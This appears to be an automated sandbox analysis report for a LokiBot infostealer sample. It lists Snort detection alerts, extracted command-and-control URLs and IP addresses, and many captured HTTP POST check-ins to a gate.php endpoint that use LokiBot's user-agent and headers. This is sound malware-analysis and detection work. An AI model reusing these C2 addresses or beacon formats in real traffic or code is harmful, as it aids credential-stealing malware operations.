                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49815 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49815 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49815 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49816 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49816 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49816 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49816 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49816 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49817 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49817 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49817 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49817 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49817 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49818 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49818 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49818 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49818 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49818 -> 35.247.234.230:80
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: http://amrp.tw/kayo/gate.php
                Found C&C like URL patternShow sources
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
